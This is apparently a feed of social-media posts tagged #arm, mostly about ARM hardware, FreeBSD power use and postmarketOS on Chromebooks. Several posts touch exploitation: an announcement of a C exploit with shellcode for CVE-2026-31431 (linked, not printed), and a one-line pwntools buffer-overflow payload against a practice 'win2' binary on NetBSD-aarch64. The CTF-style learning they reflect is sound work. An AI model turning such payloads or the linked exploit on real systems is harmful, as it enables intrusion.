The difference is quite huge under heavy transfer load… rsync runs on "yellow" Intel machine and rsyncs data from it’s local storage to the remote "blue" arm64 one. Not sure if that explains the power usage difference 🤔 #arm #FreeBSD

Alt...

Two power consumption graphs while transferring data from one server to the other.

This shows a power consumption difference while transferring (at 500Mbps-1Gbps using rsync/ssh) data from a WD 16TB with Intel N150 to a WD 16TB with ARM Cortex-A53. And makes me confident migrating to #arm is a good idea - power consumption wise. Both run #FreeBSD 14 BTW.

Alt...

Two graphs showing power consumption.

code.fail: C Version with x86+ARM shellcode

Here is an exploit written in C for the the copy.fail (https://copy.fail/, CVE-2026-31431) vulnerability. The embedded shellcode works on other CPUs than X86, with ARM as a primary target.

Code: https://github.com/huberteff/copy-fail-CVE-2026-31431/
Technical writeup: https://www.feyrer.de/redir/copy.fail-C-version-Writeup.html

#copyfail #exploit #c #arm #x86 #cybersecurity

The exploit includes cpu-specific shell code (ELF). I have the toolchain working to build working shell code and the exploit binary on both Linux/86 and Linux/ARM, but the exploit doesn't work out of the box on ARM.

Anyone got further details if this vulnerability is only valid for x86?

#arm #copyfail #linux #exploit #x86

Our Morello system has arrived!

#CHERI #ARM #Morello #capabilities

Alt...

A very large PC case containing a rather small ARM Morello board. A CHERI cap is sitting on top.

Learn something new every day! Today's lesson: a fundamental difference between x86 and ARM is how the return address for a function call is passed. The x86 CALL puts it on the stack, while ARM puts it not on the stack but in a register (Link Register LR, X30).

Now today's lesson comes from TAMUCTF2026, and it is about MIPS. There, the return address is also passed as register, just like on ARM. On MIPS, it's the Return Address register ($RA / $31).

#ctf #cybersecurity #x86 #arm #mips #ra

pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html

#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64

This afternoon's fun: pwning NetBSD-aarch64 (ARM)

(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm

#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf

Testdriving NetBSD-11.0RC2 on ARM hardware (in VM!)

http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1626.html

#netbsd #arm #qemu

Yooooo, this is exciting. I've always written off #arm #chomebook as un-saveable since they can't be jailbroken with MrChomebox.

I just got like 50 of these Asus C100P arm chromebooks that are "expired". Digging around, it looks like #postmarketOS will run on this!

Still stuff to figure out but DAMN this is promising. Being able to save even ARM chromebooks is epic. Dammit I love #linux and #openSource

Alt...

Asus Chromebook booting up to Postmarket OS